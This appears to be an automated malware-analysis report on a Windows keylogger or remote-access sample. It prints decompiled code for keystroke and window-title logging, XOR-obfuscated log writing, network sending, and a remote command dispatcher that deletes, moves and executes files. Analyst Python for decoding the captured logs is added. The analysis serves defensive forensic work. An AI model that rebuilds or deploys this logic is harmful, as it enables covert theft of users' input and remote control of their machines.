                                                                                    						_t24 = _t101 + 0x1c; // 0x1c
                                                                                    						_t104 = _t24;
                                                                                    						asm("xorps xmm0, xmm0");
                                                                                    						asm("movups [edi], xmm0");
                                                                                    						 *(_t101 + 0x10) = 0;
                                                                                    						 *_t104 = 0;
                                                                                    						if(_t87 >= 0) {
                                                                                    							_t61 = _v12;
                                                                                    						} else {
                                                                                    							_t61 =  *(_v24 + 0x18);
                                                                                    						}
                                                                                    						 *_t104 = _t61;
                                                                                    						E04EDDC90( *((intOrPtr*)(_t101 + 0x20)), _v20, _t87);
                                                                                    						_t110 = _t110 + 0xc;
                                                                                    						InterlockedExchangeAdd(_v28 + 0x40, _t87);
                                                                                    						 *((intOrPtr*)(_t101 + 0x34)) =  *((intOrPtr*)(_v28 + 0x88));
                                                                                    						_t68 =  &_v12;
                                                                                    						_v12 = 0;
                                                                                    						 *((intOrPtr*)(_t101 + 0x18)) = 3;
                                                                                    						 *(_t101 + 0x28) = 2;
                                                                                    						__imp__WSASend( *((intOrPtr*)(_t101 + 0x34)), _t104, 1, _t68, 0, _t101, 0);
                                                                                    						if(_t68 != 0xffffffff) {
                                                                                    							_t68 = 0;
                                                                                    						} else {
                                                                                    							__imp__#111();
                                                                                    						}
                                                                                    						_t106 =  !=  ? _t68 : 0;
                                                                                    						_t40 = _t101 + 0x28; // 0x28
                                                                                    						if(InterlockedDecrement(_t40) == 0 || _t106 != 0) {
                                                                                    							_t71 = E04ECC570(_v24 + 0xb0, _t101);
                                                                                    							if(_t71 == 0) {
                                                                                    								HeapFree( *( *(_t101 + 0x14)), _t71, _t101);
                                                                                    							}
                                                                                    							if(_t106 != 0) {
                                                                                    								InterlockedExchangeAdd(_v28 + 0x40,  ~_t87);
                                                                                    							} else {
                                                                                    								goto L16;
                                                                                    							}
                                                                                    						} else {
                                                                                    							goto L16;
                                                                                    						}
                                                                                    						break;
                                                                                    						L16:
                                                                                    						_t90 = _v24;
                                                                                    						_t56 = _a12 - _t87;
                                                                                    						_v20 = _v20 + _t87;
                                                                                    						_a12 = _t56;
                                                                                    						_t100 = _t90 + 0x94;
                                                                                    					} while (_t56 > 0);
                                                                                    					return E04ED572E(_v8 ^ _t109);
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • HeapAlloc.KERNEL32(?,00000000,?,00000000,00000000,?,?), ref: 04ED4213
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 04ED4270
                                                                                    • WSASend.WS2_32(?,0000001C,00000001,?), ref: 04ED42A6
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED42B1
                                                                                    • InterlockedDecrement.KERNEL32(00000028), ref: 04ED42C9
                                                                                    • HeapFree.KERNEL32(?,00000000,00000000,00000000), ref: 04ED42F1
                                                                                    • InterlockedExchangeAdd.KERNEL32(-0000003D,?), ref: 04ED4336
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$ExchangeHeap$AllocDecrementErrorFreeLastSend
                                                                                    • String ID:
                                                                                    • API String ID: 1875204869-0
                                                                                    • Opcode ID: e29a916e7e27c0f7706aa32be9466289bbdc611f4a96be5f5c591bfcfd416670
                                                                                    • Instruction ID: 4ede6eb2095655d7dfaeaa280f61bdd7cc6bcad93e33afb5691f7faf1882f819
                                                                                    • Opcode Fuzzy Hash: e29a916e7e27c0f7706aa32be9466289bbdc611f4a96be5f5c591bfcfd416670
                                                                                    • Instruction Fuzzy Hash: 3B513D71A0020AEFDB10CFA5D984BAABBB8FF58304F105629E905E7640E774F956CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E04EBB2C0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				short _v532;
                                                                                    				short _v2580;
                                                                                    				struct _SYSTEMTIME _v2596;
                                                                                    				struct HWND__* _v2600;
                                                                                    				signed int _t35;
                                                                                    				intOrPtr _t38;
                                                                                    				struct HWND__* _t39;
                                                                                    				signed int _t43;
                                                                                    				intOrPtr _t45;
                                                                                    				intOrPtr* _t50;
                                                                                    				signed int _t67;
                                                                                    				signed int _t68;
                                                                                    				WCHAR* _t70;
                                                                                    				void* _t74;
                                                                                    				signed short* _t76;
                                                                                    				intOrPtr* _t77;
                                                                                    				intOrPtr* _t82;
                                                                                    				void* _t84;
                                                                                    				void* _t85;
                                                                                    				void* _t86;
                                                                                    				intOrPtr _t87;
                                                                                    				intOrPtr* _t89;
                                                                                    				intOrPtr* _t91;
                                                                                    				signed int _t93;
                                                                                    				signed int _t94;
                                                                                    				void* _t95;
                                                                                    
                                                                                    				_t35 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t35 ^ _t94;
                                                                                    				_t70 = __ecx;
                                                                                    				if(__ecx == 0) {
                                                                                    					L24:
                                                                                    					return E04ED572E(_v8 ^ _t94);
                                                                                    				}
                                                                                    				_t91 = __ecx;
                                                                                    				_t74 = __ecx + 2;
                                                                                    				do {
                                                                                    					_t38 =  *_t91;
                                                                                    					_t91 = _t91 + 2;
                                                                                    				} while (_t38 != 0);
                                                                                    				_t93 = _t91 - _t74 >> 1;
                                                                                    				if(_t93 < 1) {
                                                                                    					goto L24;
                                                                                    				}
                                                                                    				_t39 = GetForegroundWindow();
                                                                                    				_v2600 = _t39;
                                                                                    				GetWindowTextW(_t39,  &_v532, 0x101);
                                                                                    				_t89 =  *0x4f06adc; // 0x0
                                                                                    				if(_v2600 !=  *(_t89 + 8)) {
                                                                                    					L13:
                                                                                    					_t76 =  &_v532;
                                                                                    					_t12 = _t89 + 0xc; // 0xc
                                                                                    					_t84 = _t12 - _t76;
                                                                                    					asm("o16 nop [eax+eax]");
                                                                                    					do {
                                                                                    						_t43 =  *_t76 & 0x0000ffff;
                                                                                    						_t76 =  &(_t76[1]);
                                                                                    						 *(_t84 + _t76 - 2) = _t43;
                                                                                    					} while (_t43 != 0);
                                                                                    					_t77 =  &_v532;
                                                                                    					 *(_t89 + 8) = _v2600;
                                                                                    					_t85 = _t77 + 2;
                                                                                    					do {
                                                                                    						_t45 =  *_t77;
                                                                                    						_t77 = _t77 + 2;
                                                                                    					} while (_t45 != 0);
                                                                                    					if(_t77 != _t85) {
                                                                                    						E04EDDAD0(_t89,  &_v2580, 0, 0x800);
                                                                                    						GetLocalTime( &_v2596);
                                                                                    						wsprintfW( &_v2580, L"\r\n\r\n[Title:%s]\r\n[Time:]%d-%d-%d  %d:%d:%d\r\n[Content:]",  &_v532, _v2596.wYear & 0x0000ffff, _v2596.wMonth & 0x0000ffff, _v2596.wDay & 0x0000ffff, _v2596.wHour & 0x0000ffff, _v2596.wMinute & 0x0000ffff, _v2596.wSecond & 0x0000ffff);
                                                                                    						_t95 = _t95 + 0x30;
                                                                                    						E04EBB2C0(_t70,  &_v2580, _t89, _t93);
                                                                                    						_t89 =  *0x4f06adc; // 0x0
                                                                                    					}
                                                                                    					L19:
                                                                                    					if( *((char*)(_t89 + 0x20c)) != 0) {
                                                                                    						E04EBB180(_t70);
                                                                                    						_t89 =  *0x4f06adc; // 0x0
                                                                                    					}
                                                                                    					if( *_t89 + _t93 > 0x400) {
                                                                                    						_t32 = _t89 + 0x416; // 0x416
                                                                                    						E04EDDAD0(_t89, _t32, 0, 0x800);
                                                                                    						 *_t89 = 0;
                                                                                    					}
                                                                                    					_t33 = _t89 + 0x416; // 0x416
                                                                                    					lstrcatW(_t33, _t70);
                                                                                    					_t50 =  *0x4f06adc; // 0x0
                                                                                    					 *_t50 =  *_t50 + _t93;
                                                                                    					goto L24;
                                                                                    				}
                                                                                    				_t82 =  &_v532;
                                                                                    				_t8 = _t89 + 0xc; // 0xc
                                                                                    				_t67 = _t8;
                                                                                    				while(1) {
                                                                                    					_t86 =  *_t67;
                                                                                    					if(_t86 !=  *_t82) {
                                                                                    						break;
                                                                                    					}
                                                                                    					if(_t86 == 0) {
                                                                                    						L10:
                                                                                    						_t68 = 0;
                                                                                    						L12:
                                                                                    						if(_t68 == 0) {
                                                                                    							goto L19;
                                                                                    						}
                                                                                    						goto L13;
                                                                                    					}
                                                                                    					_t87 =  *((intOrPtr*)(_t67 + 2));
                                                                                    					if(_t87 !=  *((intOrPtr*)(_t82 + 2))) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_t67 = _t67 + 4;
                                                                                    					_t82 = _t82 + 4;
                                                                                    					if(_t87 != 0) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					goto L10;
                                                                                    				}
                                                                                    				asm("sbb eax, eax");
                                                                                    				_t68 = _t67 | 0x00000001;
                                                                                    				goto L12;
                                                                                    			}

Instruction addresses for this routine (the per-line address gutter of the listing; its alignment to the lines above was lost in extraction): 0x04ebb2c9 to 0x04ebb499.

                                                                                    APIs
                                                                                    Strings
                                                                                    • [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:], xrefs: 04EBB417
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundLocalTextTimelstrcatwsprintf
                                                                                    • String ID: [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:]
                                                                                    • API String ID: 67575802-2837871436
                                                                                    • Opcode ID: d31112d61aad802f34b9bf1f8990e883614b7c9fa61da4ea745a011da6d8f986
                                                                                    • Instruction ID: 392ff58362e9ee52199042fce1a40d816fb4032844432cd979c0e1da4d618f9f
                                                                                    • Opcode Fuzzy Hash: d31112d61aad802f34b9bf1f8990e883614b7c9fa61da4ea745a011da6d8f986
                                                                                    • Instruction Fuzzy Hash: CD51B071A002199EDB24DF54DC84BFAB3B8FB18308F4455A9E94AE7940E775BA84CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
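The routine above is the sample's keystroke logger: it compares the current foreground window title with the one cached at object+0xc, and on a change it zeroes a staging buffer, stamps a record header with GetLocalTime, and appends captured text with lstrcatW into the 0x800-byte buffer at object+0x416 (flushed once the stored count passes 0x400). The added helper below is an analyst parser for that buffer, not code from the report or from the sample; it only assumes the header format copied from the string literal in the listing and that the buffer is UTF-16LE because it is written with wsprintfW/lstrcatW. The sample input is constructed for illustration.

```python
import re
from datetime import datetime

# Record header the logging routine builds with wsprintfW (so the buffer is
# UTF-16LE), copied from the string literal in the listing above:
#   "\r\n\r\n[Title:%s]\r\n[Time:]%d-%d-%d  %d:%d:%d\r\n[Content:]"
HEADER_RE = re.compile(
    r"\r\n\r\n\[Title:(?P<title>.*?)\]\r\n"
    r"\[Time:\](?P<y>\d{1,4})-(?P<mo>\d{1,2})-(?P<d>\d{1,2})  "
    r"(?P<h>\d{1,2}):(?P<mi>\d{1,2}):(?P<s>\d{1,2})\r\n"
    r"\[Content:\]",
    re.DOTALL,
)

# The listing zeroes 0x800 bytes at object+0x416 before reusing the buffer and
# flushes once the stored character count exceeds 0x400.
LOG_BUF_SIZE = 0x800


def parse_keylog_buffer(buf: bytes) -> list:
    """Split one captured log buffer into {title, time, content} records.

    The content of a record runs until the next header (or the first NUL /
    end of buffer for the last one), matching how lstrcatW appends captured
    text directly after the header.
    """
    text = buf.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
    heads = list(HEADER_RE.finditer(text))
    records = []
    for i, m in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(text)
        records.append({
            "title": m.group("title"),
            "time": datetime(int(m.group("y")), int(m.group("mo")), int(m.group("d")),
                             int(m.group("h")), int(m.group("mi")), int(m.group("s"))),
            "content": text[m.end():end],
        })
    return records


def build_sample_buffer() -> bytes:
    """Constructed test input (not a real capture): two records laid out the
    way the routine above would write them, padded to the 0x800-byte buffer."""
    parts = [
        "\r\n\r\n[Title:Untitled - Notepad]\r\n[Time:]2021-10-23  14:05:09"
        "\r\n[Content:]hello world",
        "\r\n\r\n[Title:Sign in - Google Chrome]\r\n[Time:]2021-10-23  14:06:31"
        "\r\n[Content:]user@example.com\tP@ssw0rd",
    ]
    raw = "".join(parts).encode("utf-16-le")
    return raw + b"\x00" * (LOG_BUF_SIZE - len(raw))


if __name__ == "__main__":
    for rec in parse_keylog_buffer(build_sample_buffer()):
        print(rec["time"].isoformat(), repr(rec["title"]), repr(rec["content"]))
```

Point it at a memory dump region carved from the module (the report's dump source is offset 04EB0000 in process 0000000D) or at a recovered log file; any region that decodes to the header pattern is a candidate for this buffer, and the recovered records tell you which window titles and input the sample captured.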

                                                                                    C-Code - Quality: 60%
                                                                                    			E04EB4130(void* __ebx, void* __ecx, signed char* _a4, intOrPtr _a8) {
                                                                                    				char _v8;
                                                                                    				char _v12;
                                                                                    				signed int _t26;
                                                                                    
                                                                                    				_t26 = ( *_a4 & 0x000000ff) + 0xfffffffb;
                                                                                    				if(_t26 > 0xe) {
                                                                                    					L19:
                                                                                    					return _t26;
                                                                                    				} else {
                                                                                    					switch( *((intOrPtr*)(_t26 * 4 +  &M04EB4268))) {
                                                                                    						case 0:
                                                                                    							return E04EB4C20(__ebx, __ecx, __ecx, _t36, _t31 + 1);
                                                                                    							goto L20;
                                                                                    						case 1:
                                                                                    							__eax = __edx + 1;
                                                                                    							__eax = E04EB52C0(__ebx, __ecx, __edi, __edx + 1);
                                                                                    							_pop(__edi);
                                                                                    							_pop(__esi);
                                                                                    							return __eax;
                                                                                    							goto L20;
                                                                                    						case 2:
                                                                                    							__eax = __edx + 1;
                                                                                    							__eax = E04EB56D0(__ebx, __ecx, __edi, __esi, __edx + 1);
                                                                                    							_pop(__edi);
                                                                                    							_pop(__esi);
                                                                                    							return __eax;
                                                                                    							goto L20;
                                                                                    						case 3:
                                                                                    							_a8 = _a8 - 1;
                                                                                    							__eflags = _a8 - 1;
                                                                                    							__eax = __edx + 1;
                                                                                    							__eax = E04EB5910(__ebx, __ecx, __edi, __esi, __edx + 1, __edx + 1);
                                                                                    							_pop(__edi);
                                                                                    							_pop(__esi);
                                                                                    							return __eax;
                                                                                    							goto L20;
                                                                                    						case 4:
                                                                                    							goto L19;
                                                                                    						case 5:
                                                                                    							__eax = __edx + 1;
                                                                                    							__eax = E04EB50B0(__ecx, __edx + 1);
                                                                                    							_pop(__edi);
                                                                                    							_pop(__esi);
                                                                                    							return __eax;
                                                                                    							goto L20;
                                                                                    						case 6:
                                                                                    							__eax = E04EB56A0(__ecx);
                                                                                    							_pop(__edi);
                                                                                    							_pop(__esi);
                                                                                    							return __eax;
                                                                                    							goto L20;
                                                                                    						case 7:
                                                                                    							__edx + 1 = DeleteFileW(__edx + 1);
                                                                                    							goto L4;
                                                                                    						case 8:
                                                                                    							__edx + 1 = E04EB4E30(__ebx, __ecx, __edi, __esi, __edx + 1);
                                                                                    							L4:
                                                                                    							_v8 = 0x6d;
                                                                                    							goto L5;
                                                                                    						case 9:
                                                                                    							__eax =  *(__edx + 1);
                                                                                    							 *(__edi + 0x14) =  *(__edx + 1);
                                                                                    							__eax = E04EB57F0(__ebx, __ecx, __edi, __esi);
                                                                                    							_pop(__edi);
                                                                                    							_pop(__esi);
                                                                                    							return __eax;
                                                                                    							goto L20;
                                                                                    						case 0xa:
                                                                                    							__edx + 1 = E04EB4670(__ecx, __eflags, __edx + 1);
                                                                                    							_v12 = 0x70;
                                                                                    							goto L5;
                                                                                    						case 0xb:
                                                                                    							__esi = __edx + 1;
                                                                                    							__eax = lstrlenW(__esi);
                                                                                    							__eax =  &(__eax[0]);
                                                                                    							__eax = MoveFileW(__esi, __eax);
                                                                                    							_v8 = 0x72;
                                                                                    							L5:
                                                                                    							_push(__ecx);
                                                                                    							__ecx =  *((intOrPtr*)(__edi + 4));
                                                                                    							__eax =  &_v8;
                                                                                    							_push(0x3f);
                                                                                    							_push(1);
                                                                                    							_push( &_v8);
                                                                                    							__eax = E04EB1C60( *((intOrPtr*)(__edi + 4)));
                                                                                    							_pop(__edi);
                                                                                    							_pop(__esi);
                                                                                    							return __eax;
                                                                                    							goto L20;
                                                                                    						case 0xc:
                                                                                    							_push(5);
                                                                                    							goto L16;
                                                                                    						case 0xd:
                                                                                    							_push(0);
                                                                                    							L16:
                                                                                    							__eax = __edx + 1;
                                                                                    							__eax = ShellExecuteW(0, L"open", __edx + 1, 0, 0, ??);
                                                                                    							_pop(__edi);
                                                                                    							_pop(__esi);
                                                                                    							return __eax;
                                                                                    							goto L20;
                                                                                    						case 0xe:
                                                                                    							__edx + 1 = E04EB45E0(__ecx, __edx + 1);
                                                                                    							goto L19;
                                                                                    					}
                                                                                    				}
                                                                                    				L20:
                                                                                    			}

Instruction addresses for E04EB4130 (the per-line address gutter of the listing; its alignment to the lines above was lost in extraction): 0x04eb4140 to 0x04eb4262.
                                                                                    0x04eb41cd
                                                                                    0x04eb41d1
                                                                                    0x04eb41d7
                                                                                    0x04eb41dd
                                                                                    0x04eb41e3
                                                                                    0x04eb4176
                                                                                    0x04eb4176
                                                                                    0x04eb4177
                                                                                    0x04eb417a
                                                                                    0x04eb417e
                                                                                    0x04eb4180
                                                                                    0x04eb4182
                                                                                    0x04eb4183
                                                                                    0x04eb4188
                                                                                    0x04eb4189
                                                                                    0x04eb418d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4231
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4250
                                                                                    0x04eb4233
                                                                                    0x04eb4237
                                                                                    0x04eb4242
                                                                                    0x04eb4248
                                                                                    0x04eb4249
                                                                                    0x04eb424d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4258
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb414f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(?), ref: 04EB416B
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?), ref: 04EB41D1
                                                                                    • MoveFileW.KERNEL32(?,00000001), ref: 04EB41DD
                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 04EB4242
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$DeleteExecuteMoveShelllstrlen
                                                                                    • String ID: open$r
                                                                                    • API String ID: 69973834-2967530574
                                                                                    • Opcode ID: 55db47fef8b5e88345e3fd3d9d09beeb40f7b1314e68e76e5bb3ca07f6475e80
                                                                                    • Instruction ID: 20bc27cdff3f16aca9cc2fc6171ee0e2cb071e0b564a0dfa3b34ec85c909bcc8
                                                                                    • Opcode Fuzzy Hash: 55db47fef8b5e88345e3fd3d9d09beeb40f7b1314e68e76e5bb3ca07f6475e80
                                                                                    • Instruction Fuzzy Hash: 1B31B637608109A6D200EF98F845FEBF39CEBD9225F0087A7EE44C7181DA66F55487E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 82%
                                                                                    			E04EBB180(intOrPtr* __ecx) {
                                                                                    				void* _v8;
                                                                                    				long _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				long _v20;
                                                                                    				void* _v24;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t21;
                                                                                    				intOrPtr _t25;
                                                                                    				signed char _t31;
                                                                                    				signed int _t36;
                                                                                    				void* _t37;
                                                                                    				void* _t41;
                                                                                    				long _t42;
                                                                                    				intOrPtr* _t46;
                                                                                    				void* _t49;
                                                                                    				void* _t51;
                                                                                    				void* _t53;
                                                                                    				void* _t54;
                                                                                    				void* _t55;
                                                                                    				intOrPtr* _t56;
                                                                                    				void* _t57;
                                                                                    				void* _t58;
                                                                                    				void* _t59;
                                                                                    				void* _t60;
                                                                                    				void* _t62;
                                                                                    
                                                                                    				_t21 =  *0x4f06adc; // 0x0
                                                                                    				_t56 = __ecx;
                                                                                     				_t41 = CreateFileW(_t21 + 0x20e, 0x40000000, 2, 0, 4, 0x80, 0); // path = global struct + 0x20e; GENERIC_WRITE, FILE_SHARE_WRITE, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL
                                                                                    				_v20 = 0;
                                                                                    				_v24 = _t41;
                                                                                     				if(GetFileSize(_t41, 0) < 0x3200000) { // below 50 MiB: seek to FILE_END and append; otherwise the write lands at offset 0 and overwrites the head of the file
                                                                                     					SetFilePointer(_t41, 0, 0, 2);
                                                                                     				}
                                                                                    				_t46 = _t56;
                                                                                    				_t54 = _t46 + 2;
                                                                                    				do {
                                                                                    					_t25 =  *_t46;
                                                                                    					_t46 = _t46 + 2;
                                                                                    					_t68 = _t25;
                                                                                    				} while (_t25 != 0);
                                                                                    				_t48 = _t46 - _t54 >> 1;
                                                                                    				_t42 = (_t46 - _t54 >> 1) + (_t46 - _t54 >> 1);
                                                                                    				_push(_t42);
                                                                                    				_v12 = _t42;
                                                                                    				_t60 = E04ED5785(_t48, _t59, _t68);
                                                                                    				_t55 = 0;
                                                                                    				_v8 = _t60;
                                                                                    				if(_t42 > 0) {
                                                                                    					if(_t42 >= 0x20) {
                                                                                    						_t8 = _t60 - 1; // -1
                                                                                    						_t51 = _t8 + _t42;
                                                                                    						if(_t60 > _t56 - 1 + _t42 || _t51 < _t56) {
                                                                                    							_t36 = _t42 & 0x8000001f;
                                                                                    							if(_t36 < 0) {
                                                                                    								_t36 = (_t36 - 0x00000001 | 0xffffffe0) + 1;
                                                                                    							}
                                                                                    							asm("movaps xmm1, [0x4efe8f0]");
                                                                                    							_t53 = _t42 - _t36;
                                                                                    							_t37 = _t60;
                                                                                    							_v16 = _t56 - _t60;
                                                                                    							_t42 = _v12;
                                                                                    							do {
                                                                                    								asm("movups xmm0, [esi+eax]");
                                                                                    								_t37 = _t37 + 0x20;
                                                                                    								asm("pxor xmm0, xmm1");
                                                                                    								asm("movups [eax-0x20], xmm0");
                                                                                    								asm("movups xmm0, [edi+edx+0x10]");
                                                                                    								_t55 = _t55 + 0x20;
                                                                                    								asm("pxor xmm0, xmm1");
                                                                                    								asm("movups [eax-0x10], xmm0");
                                                                                    							} while (_t55 < _t53);
                                                                                    							_t60 = _v8;
                                                                                    						}
                                                                                    					}
                                                                                    					if(_t55 < _t42) {
                                                                                    						_t49 = _t55 + _t60;
                                                                                    						_t58 = _t56 - _t60;
                                                                                    						_t62 = _t42 - _t55;
                                                                                    						do {
                                                                                    							_t31 =  *((intOrPtr*)(_t49 + _t58));
                                                                                    							_t49 = _t49 + 1;
                                                                                     							 *(_t49 - 1) = _t31 ^ 0x00000058; // byte-wise XOR 0x58 for the tail; the 32-byte SSE loop above uses the 16-byte key at 0x4efe8f0
                                                                                    							_t62 = _t62 - 1;
                                                                                    						} while (_t62 != 0);
                                                                                    						_t60 = _v8;
                                                                                    					}
                                                                                    				}
                                                                                    				_t57 = _v24;
                                                                                    				WriteFile(_t57, _t60, _t42,  &_v20, 0);
                                                                                    				CloseHandle(_t57);
                                                                                    				return E04ED573F(_t60);
                                                                                    			}
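The function above takes a wide string, XORs it (0x58 on the scalar tail, a 16-byte key from 0x4efe8f0 on the SSE blocks), and appends it to a file that is rewritten from offset 0 once it reaches 50 MiB. The following Python is an added example for triaging that file on a compromised host; it is not code from the report or from the sample. It assumes the 16-byte SSE key is 0x58 repeated (the constant itself is not on this page) and that the written buffer is UTF-16LE text without a terminator, as the `lstrlen`-style loop and `WriteFile(_t60, wcslen*2)` suggest. The file path, which comes from the global structure at offset 0x20e, is unknown here and is left as a caller-supplied blob.

```python
"""Decode and model the XOR-obfuscated log written by E04EBB180 (added example)."""
from __future__ import annotations

# Assumption (not on the page): the 16-byte SSE key at 0x4efe8f0 is 0x58 repeated,
# matching the scalar tail loop, so the whole buffer is a single-byte XOR.
XOR_KEY = 0x58
# Size cap from the decompiled check GetFileSize(...) < 0x3200000 (50 MiB).
APPEND_LIMIT = 0x3200000


def obfuscate(text: str) -> bytes:
    """Mirror what the sample writes: UTF-16LE, no terminator, every byte ^ 0x58."""
    raw = text.encode("utf-16-le")
    return bytes(b ^ XOR_KEY for b in raw)


def deobfuscate(blob: bytes) -> str:
    """Recover the logged text from a captured file; a dangling odd byte is dropped."""
    raw = bytes(b ^ XOR_KEY for b in blob)
    even_len = len(raw) - (len(raw) % 2)
    return raw[:even_len].decode("utf-16-le", errors="replace")


def looks_like_xor58_utf16(blob: bytes, sample: int = 256) -> bool:
    """Cheap triage heuristic for unknown files on disk.

    ASCII text in UTF-16LE has a 0x00 high byte on every odd offset; after XOR
    with 0x58 those bytes all read 0x58. Non-ASCII log content would break this,
    so treat a True result as a hint, not proof.
    """
    head = blob[:sample]
    if len(head) < 4:
        return False
    return all(head[i] == XOR_KEY for i in range(1, len(head), 2))


class FakeLog:
    """Model of the on-disk file: append while below the limit, else overwrite from offset 0.

    OPEN_ALWAYS leaves the file pointer at 0, so once the size check fails the
    sample's WriteFile clobbers the beginning of the existing log instead of
    appending; the rest of the old content survives.
    """

    def __init__(self, limit: int = APPEND_LIMIT) -> None:
        self.limit = limit
        self.data = bytearray()

    def write_entry(self, text: str) -> None:
        chunk = obfuscate(text)
        if len(self.data) < self.limit:
            self.data += chunk                      # SetFilePointer(h, 0, 0, FILE_END) path
        else:
            self.data[: len(chunk)] = chunk         # write at offset 0 over old entries

    def raw(self) -> bytes:
        return bytes(self.data)


def carve_entries(blob: bytes) -> str:
    """Decode a whole captured file; the page shows no record delimiter, so the
    result is one run of text in write order (with overwritten head if the
    50 MiB cap was hit)."""
    return deobfuscate(blob)


if __name__ == "__main__":
    log = FakeLog()
    log.write_entry("C:\\Users\\victim\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies")
    print(looks_like_xor58_utf16(log.raw()), carve_entries(log.raw()))
```

The overwrite branch matters for forensics: on a long-running infection the first bytes of the file are the newest data, not the oldest, so a decoder that assumes chronological order from offset 0 will misattribute timing.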

                                                                                     (address column of the disassembly listing for E04EBB180, 0x04EBB186-0x04EBB2BE; the instruction text was not extracted)

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(-0000020E,40000000,00000002,00000000,00000004,00000080,00000000), ref: 04EBB1A8
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 04EBB1BD
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 04EBB1D1
                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04EBB2A2
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EBB2A9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandlePointerSizeWrite
                                                                                    • String ID:
                                                                                    • API String ID: 1886887421-3916222277
                                                                                    • Opcode ID: a830d12ec9bc94ce7e4c27c31ddb49c050a7a48c01dacb4eeeef753fe1f6482d
                                                                                    • Instruction ID: 6f424ec599cd875a3340065a8f964c66c9b60bebbedcc46a78e0b9821d3ad31f
                                                                                    • Opcode Fuzzy Hash: a830d12ec9bc94ce7e4c27c31ddb49c050a7a48c01dacb4eeeef753fe1f6482d
                                                                                    • Instruction Fuzzy Hash: A9412871A002099FDB10DF68CD85BBEB7A5EF89308F148268E945AB245E770B945C790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 63%
                                                                                    			E04ED21E0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                                                                                    				void* __esi;
                                                                                    				void* _t38;
                                                                                    				void* _t44;
                                                                                    				void* _t53;
                                                                                    				void* _t55;
                                                                                    				LONG* _t68;
                                                                                    				void* _t69;
                                                                                    				intOrPtr* _t77;
                                                                                    				void* _t80;
                                                                                    				LONG* _t81;
                                                                                    
                                                                                    				_t62 = __ebx;
                                                                                    				_t77 = __ecx;
                                                                                    				if( *((intOrPtr*)(__ecx + 0x54)) == 3) {
                                                                                    					L12:
                                                                                    					 *((intOrPtr*)(_t77 + 0x58)) = 1;
                                                                                     					SetLastError(0x139f); // ERROR_INVALID_STATE
                                                                                    					__eflags = 0;
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					E04ECE8D0(__ecx + 0x174);
                                                                                    					_t38 =  *((intOrPtr*)( *__ecx + 0x2c))();
                                                                                    					_t85 = _t38;
                                                                                    					if(_t38 == 0) {
                                                                                    						 *(__ecx + 0x174) = 0;
                                                                                    						goto L12;
                                                                                    					} else {
                                                                                    						 *((intOrPtr*)(__ecx + 0x54)) = 2;
                                                                                    						 *(__ecx + 0x174) = 0;
                                                                                    						E04ED2390(__ecx, _t85);
                                                                                    						E04ED2F90(__ebx, _t77, _t77, _t80);
                                                                                    						_t68 = _t77;
                                                                                    						E04ED3000(__ebx, _t68, _t77, _t80);
                                                                                    						if( *((intOrPtr*)(_t77 + 0x23c)) != 0) {
                                                                                     							_push(0x80004005); // E_FAIL
                                                                                    							E04EB7AB0();
                                                                                    							goto L14;
                                                                                    						} else {
                                                                                    							_t69 = _t77 + 0x178;
                                                                                    							if( *((intOrPtr*)(_t77 + 0x17c)) != 0) {
                                                                                    								E04EC03D0(_t69, _t80);
                                                                                    							}
                                                                                    							 *((intOrPtr*)( *_t77 + 0xf4))();
                                                                                    							E04ED4920(_t77 + 0x2b4, _t77);
                                                                                    							_t68 = _t77 + 0x378;
                                                                                    							E04ED5490(_t68,  *((intOrPtr*)(_t77 + 0x1c)), 1);
